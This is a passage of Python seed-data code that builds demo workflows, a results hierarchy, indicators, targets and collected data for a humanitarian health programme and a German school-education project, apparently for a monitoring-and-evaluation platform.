created_by=self._tolauser_ninette.user, # 11
progress="open",
status="green",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=18, # 19
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=0,
name='Closeout: How to handle end matters',
expected_start_date="2018-09-01T11:00:00Z", # TODO
expected_end_date="2018-10-31T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=19, # 20
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=18, # 19
name='Evaluate project performance',
expected_start_date="2018-10-15T11:00:00Z", # TODO
expected_end_date="2018-10-31T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=20, # 21
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=18, # 19
name='Close the project',
expected_start_date="2018-09-03T11:00:00Z", # TODO
expected_end_date="2018-09-28T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="green",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=21, # 22
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=18, # 19
name='Debrief with the team',
expected_start_date="2018-10-01T11:00:00Z", # TODO
expected_end_date="2018-09-30T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="green",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=22,
workflowlevel1=self._workflowlevel1s[6],
parent_workflowlevel2=0,
name=u'Ansprache von 20 Partnerschulen in Berlin',
expected_start_date="2018-10-01T11:00:00Z", # TODO
expected_end_date="2018-09-30T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="closed",
status="green",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=23,
workflowlevel1=self._workflowlevel1s[6],
parent_workflowlevel2=0,
name=u'20 Schulen in sozialen Brennpunkten identifizieren',
expected_start_date="2018-10-01T11:00:00Z", # TODO
expected_end_date="2018-09-30T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="closed",
status="green",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=24,
workflowlevel1=self._workflowlevel1s[6],
parent_workflowlevel2=0,
name=u'Ideen zur Gestaltung der Schule finden und umsetzen',
expected_start_date="2018-10-01T11:00:00Z", # TODO
expected_end_date="2018-09-30T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="tracking",
status="yellow",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=25,
workflowlevel1=self._workflowlevel1s[6],
parent_workflowlevel2=0,
name=u'Qualifizierung der Lehrer',
expected_start_date="2018-10-01T11:00:00Z", # TODO
expected_end_date="2018-09-30T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="closed",
status="yellow",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=26,
workflowlevel1=self._workflowlevel1s[6],
parent_workflowlevel2=25,
name=u'Lehrer auswählen',
expected_start_date="2018-10-01T11:00:00Z", # TODO
expected_end_date="2018-09-30T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="closed",
status="yellow",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=27,
workflowlevel1=self._workflowlevel1s[6],
parent_workflowlevel2=25,
name=u'Trainings und Supervision durchführen',
expected_start_date="2018-10-01T11:00:00Z", # TODO
expected_end_date="2018-09-30T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="tracking",
status="yellow",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=28,
workflowlevel1=self._workflowlevel1s[6],
parent_workflowlevel2=24,
name=u'Ideenworkshops durchführen',
expected_start_date="2018-10-01T11:00:00Z", # TODO
expected_end_date="2018-09-30T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="tracking",
status="yellow",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=29,
workflowlevel1=self._workflowlevel1s[6],
parent_workflowlevel2=22,
name=u'Direktoren ansprechen',
expected_start_date="2018-10-01T11:00:00Z", # TODO
expected_end_date="2018-09-30T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="closed",
status="green",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=30,
workflowlevel1=self._workflowlevel1s[6],
parent_workflowlevel2=24,
name=u'Budgets zur Umsetzung finden',
expected_start_date="2018-10-01T11:00:00Z", # TODO
expected_end_date="2018-09-30T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="awaitingapproval",
status="red",
))
def _create_levels(self):
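# parent_id="0" marks a root level; other values reference the id of the
# parent Level, and sort reflects the depth within the hierarchy.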
self._levels.append(factories.Level(
id=1, # 7
name="Goal",
description="Improved health and survival of Syrian communities affected by conflict",
color="navy",
organization=self._organization,
parent_id="0",
workflowlevel1=self._workflowlevel1s[3], # 15
sort=0,
))
self._levels.append(factories.Level(
id=2, # 8
name="Intermediate Result",
description="Improved recovery from injuries as a result of conflict",
color="red",
organization=self._organization,
parent_id="1", # 7
workflowlevel1=self._workflowlevel1s[3], # 15
sort=1,
))
self._levels.append(factories.Level(
id=3, # 9
name="Outcome 1",
description="Emergency medical services improve in areas where emergency medical kits are provided",
color="blue",
organization=self._organization,
parent_id="2", # 8
workflowlevel1=self._workflowlevel1s[3], # 15
sort=2,
))
self._levels.append(factories.Level(
id=4, # 10
name="Outcome 2",
description="Community members with improved knowledge of hygiene practices",
color="blue",
organization=self._organization,
parent_id="2", # 8
workflowlevel1=self._workflowlevel1s[3], # 15
sort=2,
))
self._levels.append(factories.Level(
id=5, # 11
name="Output 1",
description="Emergency Medical Kits are delivered to mobile medical units in conflict-affected populations",
color="green",
organization=self._organization,
parent_id="3", # 9
workflowlevel1=self._workflowlevel1s[3], # 15
sort=3,
))
self._levels.append(factories.Level(
id=6, # 12
name="Output 2",
description="Treat injuries and emergency medical needs of affected communities",
color="green",
organization=self._organization,
parent_id="3", # 9
workflowlevel1=self._workflowlevel1s[3], # 15
sort=3,
))
self._levels.append(factories.Level(
id=7, # 13
name="Output 3",
description="Hand Washing Knowledge and Capacity",
color="green",
organization=self._organization,
parent_id="4", # 10
workflowlevel1=self._workflowlevel1s[3], # 15
sort=3,
))
self._levels.append(factories.Level(
id=8, # 14
name="Output 4",
description="Household Water Quality is Improved",
color="green",
organization=self._organization,
parent_id="4", # 10
workflowlevel1=self._workflowlevel1s[3], # 15
sort=3,
))
self._levels.append(factories.Level(
id=9,
name=(u"Impact: Verwirklichung des Kinderrechts auf Bildung in "
u"Deutschland"),
description=(u"Verwirklichung der Rechte Kindern aus sozial "
u"benachteiligten Bevölkerungsgruppen auf qualitativ "
u"hochwertige Bildung und Entwicklung"),
color="red",
organization=self._organization,
parent_id="0",
workflowlevel1=self._workflowlevel1s[6],
sort=0,
))
self._levels.append(factories.Level(
id=10,
name=u"Outcome: Gute Bildung und Lernen ermöglichen",
description=(u"Ziel ist es, Kindern unabhängig von ihrem "
u"Hintergrund und ihrer Herkunft die Möglichkeit auf "
u"gute Bildung und erfolgreiches Lernen zu "
u"ermöglichen"),
color="blue",
organization=self._organization,
parent_id="9",
workflowlevel1=self._workflowlevel1s[6],
sort=1,
))
self._levels.append(factories.Level(
id=11,
name=u"Outcome: Kooperation zwischen Eltern/Lehrern verbessern",
description=(u"Ziel ist es, eine stabile Beziehung zwischen "
u"Eltern und Lehrern zu bauen, Eltern in die "
u"Aktivitäten der Schule einzubeziehen und eine "
u"stabile Kommunikation aufzubauen."),
color="blue",
organization=self._organization,
parent_id="9",
workflowlevel1=self._workflowlevel1s[6],
sort=1,
))
self._levels.append(factories.Level(
id=12,
name=u"Outcome: Schulen familienfreundlicher gestalten",
description=(u"Ziel ist es, Schulen nicht nur als Raum zum Lernen, "
u"sondern auch zum Leben zu gestalten. Eine offene "
u"und vertrauensvolle Atmosphäre zu kreieren, in dem "
u"die ganze Persönlichkeit gesehen und gefördert "
u"wird."),
color="green",
organization=self._organization,
parent_id="9",
workflowlevel1=self._workflowlevel1s[6],
sort=1,
))
self._levels.append(factories.Level(
id=13,
name=u"Output: Schulungen für Familien durchführen",
description=u"",
color="green",
organization=self._organization,
parent_id="10",
workflowlevel1=self._workflowlevel1s[6],
sort=2,
))
self._levels.append(factories.Level(
id=14,
name=u"Output: Elternbeteiligung stärken",
description=u"",
color="green",
organization=self._organization,
parent_id="11",
workflowlevel1=self._workflowlevel1s[6],
sort=2,
))
self._levels.append(factories.Level(
id=15,
name=u"Output: Partnerschaftliches Verhältnis etablieren",
description=u"",
color="green",
organization=self._organization,
parent_id="11",
workflowlevel1=self._workflowlevel1s[6],
sort=2,
))
self._levels.append(factories.Level(
id=16,
name=u"Output: Fortbildungen für Lehrer",
description=u"",
color="green",
organization=self._organization,
parent_id="10",
workflowlevel1=self._workflowlevel1s[6],
sort=2,
))
self._levels.append(factories.Level(
id=17,
name=u"Output: Ideen partizipativ entwickeln und umsetzen",
description=u"",
color="green",
organization=self._organization,
parent_id="12",
workflowlevel1=self._workflowlevel1s[6],
sort=2,
))
self._levels.append(factories.Level(
id=18,
name=u"Output: Sprachbarrieren abbauen",
description=u"",
color="green",
organization=self._organization,
parent_id="11",
workflowlevel1=self._workflowlevel1s[6],
sort=2,
))
def _create_frequencies(self):
self._frequencies.append(factories.Frequency(
id=1, # 2
frequency="Quarterly",
description="Quarterly",
organization=self._organization,
))
self._frequencies.append(factories.Frequency(
id=2, # 4
frequency="Monthly",
description="Monthly",
organization=self._organization,
))
self._frequencies.append(factories.Frequency(
id=3, # 5
frequency="Semi Annual",
description="Semi Annual",
organization=self._organization,
))
self._frequencies.append(factories.Frequency(
id=4, # 7
frequency="Annual",
description="Annual",
organization=self._organization,
))
self._frequencies.append(factories.Frequency(
id=5, # 8
frequency="Baseline, Endline",
description="Baseline, Endline",
organization=self._organization,
))
self._frequencies.append(factories.Frequency(
id=6, # 9
frequency="Weekly",
description="Weekly",
organization=self._organization,
))
self._frequencies.append(factories.Frequency(
id=7, # 10
frequency="Baseline, midline, endline",
description="Baseline, midline, endline",
organization=self._organization,
))
self._frequencies.append(factories.Frequency(
id=8, # 11
frequency="Bi-weekly",
description="Bi-weekly",
organization=self._organization,
))
self._frequencies.append(factories.Frequency(
id=9, # 12
frequency="Monthly, Quarterly, Annually",
description="Monthly, Quarterly, Annually",
organization=self._organization,
))
self._frequencies.append(factories.Frequency(
id=10, # 16
frequency="End of cycle",
description="End of cycle",
organization=self._organization,
))
def _create_indicators(self):
self._indicators.append(factories.Indicator(
id=1, # 2
level=self._levels[1], # 7
name="# of individuals in a need of humanitarian assistance",
number="1",
lop_target=7500,
key_performance_indicator=True,
created_by=self._tolauser_ninette.user, # 11
workflowlevel1=[self._workflowlevel1s[3]], # 15
))
self._indicators.append(factories.Indicator(
id=2, # 3
level=self._levels[2], # 8
name="% of injured community members who make full recovery",
number="1.1",
lop_target=70,
key_performance_indicator=False,
created_by=self._tolauser_ninette.user, # 11
workflowlevel1=[self._workflowlevel1s[3]], # 15
))
self._indicators.append(factories.Indicator(
id=3, # 4
level=self._levels[3], # 9
name="% of mobile medical units who have adequate supply of emergency medical kits",
number="2.1",
lop_target=80,
key_performance_indicator=False,
created_by=self._tolauser_ninette.user, # 11
workflowlevel1=[self._workflowlevel1s[3]], # 15
))
self._indicators.append(factories.Indicator(
id=4, # 5
level=self._levels[4], # 10
name="% of respondents who know 3 of 5 critical times to wash hands",
number="3.1",
lop_target=75,
key_performance_indicator=False,
created_by=self._tolauser_ninette.user, # 11
workflowlevel1=[self._workflowlevel1s[3]], # 15
))
self._indicators.append(factories.Indicator(
id=5, # 6
level=self._levels[5], # 11
name="# of medical kits provided to partner mobile medical units",
number="2.1.1",
lop_target=2500,
key_performance_indicator=False,
created_by=self._tolauser_ninette.user, # 11
workflowlevel1=[self._workflowlevel1s[3]], # 15
))
self._indicators.append(factories.Indicator(
id=6, # 7
level=self._levels[5], # 11
name="% of emergency medical kits distributed within two weeks of identification of critical need",
number="2.1.2",
lop_target=60,
key_performance_indicator=False,
created_by=self._tolauser_ninette.user, # 11
workflowlevel1=[self._workflowlevel1s[3]], # 15
))
self._indicators.append(factories.Indicator(
id=7, # 8
level=self._levels[3], # 9
name="# of beneficiaries treated",
number="2.2.1",
lop_target=500,
key_performance_indicator=False,
created_by=self._tolauser_ninette.user, # 11
workflowlevel1=[self._workflowlevel1s[3]], # 15
))
self._indicators.append(factories.Indicator(
id=8, # 9
level=self._levels[6], # 12
name="# of locations set up by mobile medical units",
number="2.2.2",
lop_target=10,
key_performance_indicator=False,
created_by=self._tolauser_ninette.user, # 11
workflowlevel1=[self._workflowlevel1s[3]], # 15
))
self._indicators.append(factories.Indicator(
id=9, # 10
level=self._levels[6], # 12
name="# of days mobile medical units spent at each location",
number="2.2.3",
lop_target=5,
key_performance_indicator=False,
created_by=self._tolauser_ninette.user, # 11
workflowlevel1=[self._workflowlevel1s[3]], # 15
))
self._indicators.append(factories.Indicator(
id=10, # 11
level=self._levels[7], # 13
name="# of people receiving hygiene promotion",
number="3.1.1",
lop_target=5000,
key_performance_indicator=False,
created_by=self._tolauser_ninette.user, # 11
workflowlevel1=[self._workflowlevel1s[3]], # 15
))
self._indicators.append(factories.Indicator(
id=11, # 12
level=self._levels[8], # 14
name="# of people receiving household water quality education",
number="3.2.1",
lop_target=5000,
key_performance_indicator=False,
created_by=self._tolauser_ninette.user, # 11
workflowlevel1=[self._workflowlevel1s[3]], # 15
))
self._indicators.append(factories.Indicator(
id=12, # 13
level=self._levels[8], # 14
name="# of individuals in acute need of humanitarian assistance",
number="1",
lop_target=7500,
sector=self._sectors[44], # 173
key_performance_indicator=True,
created_by=self._tolauser_ninette.user, # 11
workflowlevel1=[self._workflowlevel1s[3]], # 15
))
self._indicators.append(factories.Indicator(
id=13,
level=self._levels[9],
name=u"Anzahl aktive Initiativen",
lop_target=5500,
key_performance_indicator=True,
created_by=self._tolauser_ninette.user,
reporting_frequency=self._frequencies[9],
workflowlevel1=[self._workflowlevel1s[6]],
))
self._indicators.append(factories.Indicator(
id=14,
level=self._levels[13],
name=u"Anzahl Schulungen",
number="5000",
lop_target=50000,
key_performance_indicator=True,
created_by=self._tolauser_ninette.user,
reporting_frequency=self._frequencies[9],
method_of_analysis="Questionnaire",
workflowlevel1=[self._workflowlevel1s[6]],
))
self._indicators.append(factories.Indicator(
id=15,
level=self._levels[12],
name=u"Ideenwerkstätten",
lop_target=15000,
key_performance_indicator=False,
created_by=self._tolauser_ninette.user,
reporting_frequency=self._frequencies[9],
workflowlevel1=[self._workflowlevel1s[6]],
))
self._indicators.append(factories.Indicator(
id=16,
level=self._levels[9],
name=u"Anzahl direkt erreichter Kinder",
lop_target=250000,
key_performance_indicator=True,
approval_submitted_by=self._tolauser_andrew,
created_by=self._tolauser_ninette.user,
reporting_frequency=self._frequencies[9],
workflowlevel1=[self._workflowlevel1s[6]],
))
self._indicators.append(factories.Indicator(
id=17,
level=self._levels[11],
name=u"Mehrsprachige Informationsmaterialien (10 Sprachen)",
lop_target=600000,
sector=self._sectors[11],
key_performance_indicator=False,
approval_submitted_by=self._tolauser_andrew,
created_by=self._tolauser_ninette.user,
reporting_frequency=self._frequencies[9],
workflowlevel1=[self._workflowlevel1s[6]],
))
def _create_periodic_targets(self):
factories.PeriodicTarget(
id="1", # 1
period="February 2018",
target="500.00",
indicator=self._indicators[1], # 2
)
factories.PeriodicTarget(
id="2", # 2
period="March 2018",
target="1000.00",
indicator=self._indicators[1], # 2
)
factories.PeriodicTarget(
id="3", # 3
period="April 2018",
target="1000.00",
indicator=self._indicators[1], # 2
)
factories.PeriodicTarget(
id=4, # 4
period="May 2018",
target="1500.00",
indicator=self._indicators[1], # 2
)
factories.PeriodicTarget(
id=5, # 5
period="June 2018",
target="1500.00",
indicator=self._indicators[1], # 2
)
factories.PeriodicTarget(
id=6, # 6
period="July 2018",
target="1000.00",
indicator=self._indicators[1], # 2
)
factories.PeriodicTarget(
id=7, # 10
period="August 2018",
target="70.00",
indicator=self._indicators[2], # 3
)
factories.PeriodicTarget(
id=8, # 11
period="February 2018",
target="500.00",
indicator=self._indicators[12], # 13
)
factories.PeriodicTarget(
id=9, # 12
period="March 2018",
target="500.00",
indicator=self._indicators[12], # 13
)
factories.PeriodicTarget(
id=10, # 13
period="April 2018",
target="1000.00",
indicator=self._indicators[12], # 13
)
factories.PeriodicTarget(
id=11, # 14
period="May 2018",
target="1000.00",
indicator=self._indicators[12], # 13
)
factories.PeriodicTarget(
id=12, # 15
period="June 2018",
target="1500.00",
indicator=self._indicators[12], # 13
)
factories.PeriodicTarget(
id=13, # 16
period="July 2018",
target="1500.00",
indicator=self._indicators[12], # 13
)
factories.PeriodicTarget(
id=14, # 17
period="August 2018",
target="1500.00",
indicator=self._indicators[12], # 13
)
factories.PeriodicTarget(
id=15, # 18
period="August 2018",
target="80.00",
indicator=self._indicators[3], # 4
)
factories.PeriodicTarget(
id=16, # 19
period="February 2018",
target="100.00",
indicator=self._indicators[7], # 8
)
factories.PeriodicTarget(
id=17, # 20
period="March 2018",
target="100.00",
indicator=self._indicators[7], # 8
)
factories.PeriodicTarget(
id=18, # 21
period="April 2018",
target="100.00",
indicator=self._indicators[7], # 8
)
factories.PeriodicTarget(
id=19, # 22
period="May 2018",
target="100.00",
indicator=self._indicators[7], # 8
)
factories.PeriodicTarget(
id=20, # 23
period="June 2018",
target="100.00",
indicator=self._indicators[7], # 8
)
factories.PeriodicTarget(
id=21, # 24
period="July 2018",
target="50.00",
indicator=self._indicators[7], # 8
)
factories.PeriodicTarget(
id=22, # 26
period="August 2018",
target="75.00",
indicator=self._indicators[4], # 5
)
factories.PeriodicTarget(
id=23, # 27
period="February 2018",
target="250.00",
indicator=self._indicators[5], # 6
)
factories.PeriodicTarget(
id=24, # 28
period="March 2018",
target="250.00",
indicator=self._indicators[5], # 6
)
factories.PeriodicTarget(
id=25, # 29
period="April 2018",
target="500.00",
indicator=self._indicators[5], # 6
)
factories.PeriodicTarget(
id=26, # 30
period="May 2018",
target="500.00",
indicator=self._indicators[5], # 6
)
factories.PeriodicTarget(
id=27, # 34
period="August 2018",
target="60.00",
indicator=self._indicators[6], # 7
)
factories.PeriodicTarget(
id=28, # 35
period="February 2018",
target="1.00",
indicator=self._indicators[8], # 9
)
factories.PeriodicTarget(
id=29, # 36
period="March 2018",
target="2.00",
indicator=self._indicators[8], # 9
)
factories.PeriodicTarget(
id=30, # 37
period="April 2018",
target="3.00",
indicator=self._indicators[8], # 9
)
factories.PeriodicTarget(
id=31, # 38
period="May 2018",
target="2.00",
indicator=self._indicators[8], # 9
)
factories.PeriodicTarget(
id=32, # 39
period="June 2018",
target="1.00",
indicator=self._indicators[8], # 9
)
factories.PeriodicTarget(
id=33, # 40
period="August 2018",
target="1.00",
indicator=self._indicators[8], # 9
)
factories.PeriodicTarget(
id=34, # 41
period="August 2018",
target="5.00",
indicator=self._indicators[9], # 10
)
factories.PeriodicTarget(
id=35, # 42
period="July 2018",
target="2500.00",
indicator=self._indicators[10], # 11
)
factories.PeriodicTarget(
id=36, # 43
period="August 2018",
target="2500.00",
indicator=self._indicators[10], # 11
)
factories.PeriodicTarget(
id=37, # 44
period="July 2018",
target="2500.00",
indicator=self._indicators[11], # 12
)
factories.PeriodicTarget(
id=38, # 45
period="August 2018",
target="2500.00",
indicator=self._indicators[11], # 12
)
def _create_collected_data(self):
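# periodic_target_id values are the ids of the PeriodicTarget records created
# in _create_periodic_targets(); the trailing comments appear to be the
# corresponding ids in the original data set.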
factories.CollectedData(
id=1,
periodic_target_id="1", # 1
achieved="500.00",
indicator=self._indicators[1], # 2
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[1]], # 5
)
factories.CollectedData(
id=2,
periodic_target_id="2", # 2
achieved="500.00",
indicator=self._indicators[1], # 2
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[2]] # 6
)
factories.CollectedData(
id=3,
periodic_target_id="3", # 3
achieved="1000.00",
indicator=self._indicators[1], # 2
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[3]], # 7
)
factories.CollectedData(
id=4,
periodic_target_id="5", # 5
achieved="1000.00",
indicator=self._indicators[1], # 2
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[4]], # 8
)
factories.CollectedData(
id=5,
periodic_target_id="4", # 4
achieved="1000.00",
indicator=self._indicators[1], # 2
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[5]], # 9
)
factories.CollectedData(
id=6,
periodic_target_id="6", # 6
achieved="1500.00",
indicator=self._indicators[1], # 2
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[5]], # 9
)
factories.CollectedData(
id=7,
periodic_target_id="6", # 6
achieved="1500.00",
indicator=self._indicators[1], # 2
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[1]], # 5
)
factories.CollectedData(
id=8,
periodic_target_id="8", # 11
achieved="500.00",
indicator=self._indicators[12], # 13
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[1]], # 5
)
factories.CollectedData(
id=9,
periodic_target_id="9", # 12
achieved="500.00",
indicator=self._indicators[12], # 13
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[2]], # 6
)
factories.CollectedData(
id=10,
periodic_target_id="10", # 13
achieved="1000.00",
indicator=self._indicators[12], # 13
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[3]], # 7
)
factories.CollectedData(
id=11,
periodic_target_id="11", # 14
achieved="1000.00",
indicator=self._indicators[12], # 13
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[4]], # 8
)
factories.CollectedData(
id=12,
periodic_target_id="12", # 15
achieved="1500.00",
indicator=self._indicators[12], # 13
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[5]], # 9
)
factories.CollectedData(
id=13,
periodic_target_id="13", # 16
achieved="1500.00",
indicator=self._indicators[12], # 13
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[2]], # 6
)
factories.CollectedData(
id=14,
periodic_target_id="14", # 17
achieved="500.00",
indicator=self._indicators[12], # 13
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[1]], # 5
)
factories.CollectedData(
id=15,
periodic_target_id="7", # 10
achieved="65.00",
indicator=self._indicators[2], # 3
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[2]], # 6
)
factories.CollectedData(
id=16,
periodic_target_id="15", # 18
achieved="78.00",
indicator=self._indicators[3], # 4
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[1]], # 5
)
factories.CollectedData(
id=17,
periodic_target_id="16", # 19
achieved="75.00",
indicator=self._indicators[7], # 8
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[1]], # 5
)
factories.CollectedData(
id=18,
periodic_target_id="17", # 20
achieved="100.00",
indicator=self._indicators[7], # 8
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[2]], # 6
)
factories.CollectedData(
id=19,
periodic_target_id="18", # 21
achieved="100.00",
indicator=self._indicators[7], # 8
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[3]], # 7
)
factories.CollectedData(
id=20,
periodic_target_id="19", # 22
achieved="90.00",
indicator=self._indicators[7], # 8
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[4]], # 8
)
factories.CollectedData(
id=21,
periodic_target_id="20", # 23
achieved="125.00",
indicator=self._indicators[7], # 8
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[5]], # 9
)
factories.CollectedData(
id=22,
periodic_target_id="21", # 24
achieved="50.00",
indicator=self._indicators[7], # 8
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[2]], # 6
)
factories.CollectedData(
id=23,
periodic_target_id="22", # 26
achieved="55.00",
indicator=self._indicators[4], # 5
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[2]], # 6
)
factories.CollectedData(
id=24,
periodic_target_id="34", # 41
achieved="4.50",
indicator=self._indicators[9], # 10
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[1], self._site_profiles[2], self._site_profiles[3], self._site_profiles[4], self._site_profiles[5]], # [5, 6, 7, 8, 9]
)
factories.CollectedData(
id=25,
periodic_target_id="23", # 27
achieved="500.00",
indicator=self._indicators[5], # 6
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[1]], # 5
)
factories.CollectedData(
id=26,
periodic_target_id="24", # 28
achieved="500.00",
indicator=self._indicators[5], # 6
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[2]], # 6
)
factories.CollectedData(
id=27,
periodic_target_id="25", # 29
achieved="1000.00",
indicator=self._indicators[5], # 6
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[3]], # 7
)
factories.CollectedData(
id=28,
periodic_target_id="26", # 30
achieved="300.00",
indicator=self._indicators[5], # 6
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[4]], # 8
)
factories.CollectedData(
id=29,
periodic_target_id="27", # 34
achieved="55.00",
indicator=self._indicators[6], # 7
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[2]], # 6
)
factories.CollectedData(
id=30,
periodic_target_id="28", # 35
achieved="1.00",
indicator=self._indicators[8], # 9
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[1]], # 5
)
factories.CollectedData(
id=31,
periodic_target_id="29", # 36
achieved="2.00",
indicator=self._indicators[8], # 9
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[2]], # 6
)
factories.CollectedData(
id=32,
periodic_target_id="30", # 37,
achieved="3.00",
indicator=self._indicators[8], # 9
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[3]], # 7
)
factories.CollectedData(
id=33,
periodic_target_id="31", # 38
achieved="2.00",
indicator=self._indicators[8], # 9
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[4]], # 8
)
factories.CollectedData(
id=34,
periodic_target_id="32", # 39
achieved="1.00",
indicator=self._indicators[8], # 9
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[2]], # 6
)
factories.CollectedData(
id=35,
periodic_target_id="33", # 40
achieved="1.00",
indicator=self._indicators[8], # 9
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[1]], # 5
)
factories.CollectedData(
id=36,
periodic_target_id="35", # 42
achieved="2500.00",
indicator=self._indicators[10], # 11
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[2]], # 6
)
factories.CollectedData(
id=37,
periodic_target_id="36", # 43
achieved="2000.00",
indicator=self._indicators[10], # 11
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[2]], # 6
)
factories.CollectedData(
id=38,
periodic_target_id="37", # 44
achieved="2500.00",
indicator=self._indicators[11], # 12
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[1]], # 5
)
factories.CollectedData(
id=39,
periodic_target_id="38", # 45
achieved="2000.00",
indicator=self._indicators[11], # 12
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[2]], # 6
)
factories.CollectedData(
id=40,
achieved="1500.00",
indicator=self._indicators[13],
workflowlevel1=self._workflowlevel1s[6],
created_by=self._tolauser_ninette.user,
site=[self._site_profiles[6]],
)
factories.CollectedData(
id=41,
achieved="23000.00",
indicator=self._indicators[14],
workflowlevel1=self._workflowlevel1s[6],
created_by=self._tolauser_ninette.user,
)
factories.CollectedData(
id=42,
achieved="3700.00",
indicator=self._indicators[15],
workflowlevel1=self._workflowlevel1s[6],
created_by=self._tolauser_ninette.user,
)
factories.CollectedData(
id=43,
achieved="125000.00",
indicator=self._indicators[16],
workflowlevel1=self._workflowlevel1s[6],
